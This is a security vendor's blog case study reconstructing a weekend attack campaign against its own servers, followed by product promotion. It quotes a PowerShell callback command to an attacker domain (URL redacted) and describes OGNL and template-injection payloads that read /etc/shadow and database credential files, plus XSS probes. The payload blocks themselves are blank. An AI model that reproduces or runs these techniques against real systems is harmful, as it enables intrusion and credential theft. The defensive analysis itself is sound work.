48-Hour Case Study: Analyzing Coordinated Attacks from Mumbai, India

Over one weekend, Contrast detected 87 coordinated attacks originating from infrastructure in Mumbai, India that targeted the usually dangerous blind spot between perimeter defenses and application runtimes. This type of complex attack is why organizations use Contrast Application Detection and Response. This campaign, launched on October 18th and 19th, is a textbook demonstration of the sophisticated, multi-vector TTPs used by modern adversaries who understand how to exploit the problem in most organizations. There’s no real-time visibility into runtime application attacks or the ability to stop them.  

This was not a theoretical test or customer incident; the attacks targeted Contrast itself. Because we saw the full attack chain firsthand, we can show exactly how ADR detects, interprets, and blocks what others miss.

Contrast Labs has put together this analysis of the observed attack progression - from initial reconnaissance and shell command execution to framework-specific RCE and credential harvesting - as a critical case study for defense teams.  Read on for a phase-by-phase reconstruction showing how these attackers weaponized obfuscation and in-process execution to evade WAFs and EDRs, and the runtime signals that flagged them.

Note: This article was updated to reflect updated facts.

Phase 1: Initial reconnaissance and OS command injection

The campaign began on Saturday with a probe on Contrast Security infrastructure via HTTP GET. The command is designed to confirm a Remote Code Execution (RCE) vulnerability using the system-level utility Windows PowerShell.

Payload:

The core command, iwr -uri [redacted], forces the target server to quietly reach out to an external domain controlled by the attacker. By checking for the unique-id identifier within that outbound connection, an attacker can confirm both the host and RCE vulnerability are active, clearing the way for a more damaging follow-up attack. 

• MITRE ATT&CK tactics: Initial Access (T1190), Reconnaissance (TA0043), Vulnerability Scanning (T1595.002)
• Procedure: Command and Scripting Interpreter (T1059.001) via PowerShell's Invoke-WebRequest (iwr) cmdlet. The execution does not return data; its success is passively logged by an external listener.
  
  
• SOC Blind Spot: For applications protected only by traditional security tools, this execution often proceeds undetected. The request can bypass WAF inspection due to parameter placement or, if executed, is viewed by network and endpoint security as the application itself performing a legitimate outbound HTTP request, providing no visibility into the malicious payload executed at the application layer.

Phase 2: Pivot to application-specific probing

That same day, seeing that their Windows PowerShell probe failed to return a positive signal, the attacker immediately shifted focus to application-specific vectors, moving from OS Command Injection to highly specific attack attempts aimed at discovering and exploiting vulnerabilities within common Java application frameworks.

This rapid pivot demonstrates the attacker’s broad reconnaissance capabilities and immediate understanding that the application layer itself, rather than the host, is a viable target. The subsequent attacks are not an escalation following RCE confirmation, but rather two additional, more refined attempts to achieve RCE by targeting the application's Java expression interpreters.

These framework-specific payloads are often highly obfuscated (i.e. double URL-encoding) specifically to defeat static WAF signatures. If a WAF fails to recognize the obfuscated input, the payload is delivered to the application runtime, where the malicious expression executes as native application code.

Attack attempt #1: Struts 2 RCE exploitation (OGNL injection)

The attacker first attempts a chained OGNL (Object-Graph Navigation Language) injection attack. This is a critical probe for achieving persistent, platform-independent RCE within the JVM.

Payload excerpt:

• MITRE ATT&CK tactic: Execution (TA0002) and Defense Evasion (TA0005).
• Procedure: The payload attempts to gain control over the JVM by navigating the Struts ValueStack. Specifically, it uses the Struts ValueStack and BeanMap utilities to locate and clear security blacklists (excludedClasses, excludedPackageNames) on the MemberAccess object. This process is necessary for Defense Evasion to allow the final command, creating and executing an instance of a system utility like freemarker.template.utility.Execute, which is capable of running system shell commands. The argument list (#arglist) contains the command: cat /etc/shadow. The /etc/shadow file on Linux/Unix systems contains the hashed passwords for local users. Successfully executing this command allows the attacker to steal these hashes directly from the filesystem.
• SOC blind spot: If this payload successfully reaches the application, the malicious expression execution occurs entirely within the application's runtime. Traditional monitoring tools only observe the incoming HTTP request. They cannot see the OGNL interpreter executing code, nor can they see the internal Java classes being modified for security bypass. The SOC team receives zero contextual visibility of this security control.

Attack attempt #2: RCE via server-side template injection

This payload is an attempt at Remote Code Execution (RCE) using a Server-Side Template Injection (SSTI) technique to steal database credentials. It specifically targets applications that process Jelly or Glide templating tags.

Payload:

• MITRE ATT&CK tactic: Data Exfiltration over Other Network Medium (T1011)
• Procedure: The payload utilizes <g:evaluate> tags to execute script that performs directory traversal to locate and read the highly sensitive glide.db.properties file. The ultimate action is to print the database credentials into an application error message (gs.addErrorMessage(s)), achieving Data Exfiltration via the HTTP response body.
• SOC blind spot:  If successful, this attack reads sensitive file content entirely within the Java application process. The SOC team would only see a seemingly routine application error message returned to the client. They would have no visibility into the internal file system access, the credential reading event, or the deliberate manipulation of the error handler to exfiltrate data, as these actions never leave the application layer for host- or network-based monitoring to detect.

Phase 3: Client-side attack (XSS)

A final attack vector included attempts at Cross-Site Scripting (XSS). While unsuccessful, this attack shows that the adversary was performing exhaustive reconnaissance to map out both server-side and client-side injection points, demonstrating readiness to pivot to user compromise (e.g., session hijacking or credential theft) should server-side RCE attempts fail.

Payload examples:

• MITRE ATT&CK tactic: Command and Scripting Interpreter: JavaScript (T1059.007)
• Procedure: The injection aims to execute arbitrary JavaScript within a victim's browser, enabling session hijacking, credential theft, or content defacement. This attack shifts the focus from the server to the client but maintains the same principle of injecting and executing code that is not part of the legitimate application. The attacker submits this payload, hoping the server will reflect the content of the message parameter directly back to the user's browser without properly sanitizing or encoding the HTML output.
• SOC blind spot: If the client-side attack is successful, the attack's consequences occur outside the server and network perimeter, and thus, outside of the SOC’s view. The subsequent critical actions, such as the injected JavaScript stealing a user's session cookie, capturing credentials via keystroke logging, or redirecting the user, all take place within the victim's web browser. Therefore, the SOC has no record of the payload executing, the data being compromised, or the severity of the user-side impact.

How Contrast closes the blind spot

Attacks like these hinge on two common security weaknesses:

1. Weak perimeter defenses: Polymorphic, encoded payloads easily bypass the static, signature-based rules of traditional perimeter defenses (i.e. WAF).
2. Payload execution blindness (No runtime context): If payloads execute, traditional security tools have no way to inspect the internal actions (e.g., the OGNL changing Java security policies or the SpEL script reading a database file).
3. Delayed detection and response (High dwell time): Since the attack is executed within the application process, security operations teams may experience long dwell times and rely on fragmented logs, crippling their ability to triage and respond in real-time.

Contrast’s Application Detection & Response (ADR) closes this blind spot by instrumenting the application from within. ADR sensors observe application behavior in real-time, providing runtime visibility to immediately detect and block malicious execution.

Contrast ADR is effective because it:

• Detects behavior, not signatures: It recognizes the act of an OGNL expression attempting to clear security policies or a file-reading function being called by an injected script, regardless of the payload's encoding or obfuscation.
• Provides real-time protection: Attacks like Struts OGNL Injection and SpEL Injection are detected and blocked instantly at runtime, preventing the malicious code from completing its operation.
• Eliminates blind spots: Security teams gain full context of an application’s entire environment: the attacker's IP, the vulnerable line of code, and the full payload, the executed stack trace, enabling rapid response and informed remediation for both security and development teams.

Traditional defenses, like Web Application Firewalls (WAF) and Endpoint Detection & Response (EDR), routinely fail to maintain runtime visibility, leaving a critical blind spot at the application layer. By shifting defense from the vulnerable perimeter to the code itself, Contrast ADR neutralizes these sophisticated attacks. ADR sensors provide the contextual, code-level insight necessary to detect and block malicious execution instantly, transforming the defender's posture from reactive perimeter management to active, in-application protection.